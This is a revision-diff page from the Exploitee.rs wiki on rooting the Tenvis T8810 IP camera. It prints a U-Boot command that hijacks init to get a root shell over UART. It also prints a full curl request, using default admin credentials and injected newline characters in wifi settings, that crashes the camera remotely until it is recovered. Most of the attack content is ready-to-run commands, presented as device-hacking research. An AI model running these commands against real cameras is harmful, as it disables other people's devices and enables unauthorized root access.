Difference between revisions of "Tenvis T8810"

From Exploitee.rs
Jump to navigationJump to search
Line 14: Line 14:
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh
The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh


<pre>
<pre style="white-space: pre-wrap;">
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
</pre>
</pre>
Line 30: Line 30:
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.


<pre>
<pre style="white-space: pre-wrap;">
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed​
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed​
<pre>
<pre>

Revision as of 04:42, 9 August 2017

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

TENVIS T8110.JPG

Tenvis T8810

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Tenvis T8810 at Amazon

Hardware Root

The UART interface on this device is located [pictured], and runs at ?????????? and auto boots after a three second delay. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh

setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm

Remote Denial of Service

WARNING

This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.

Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.

curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed​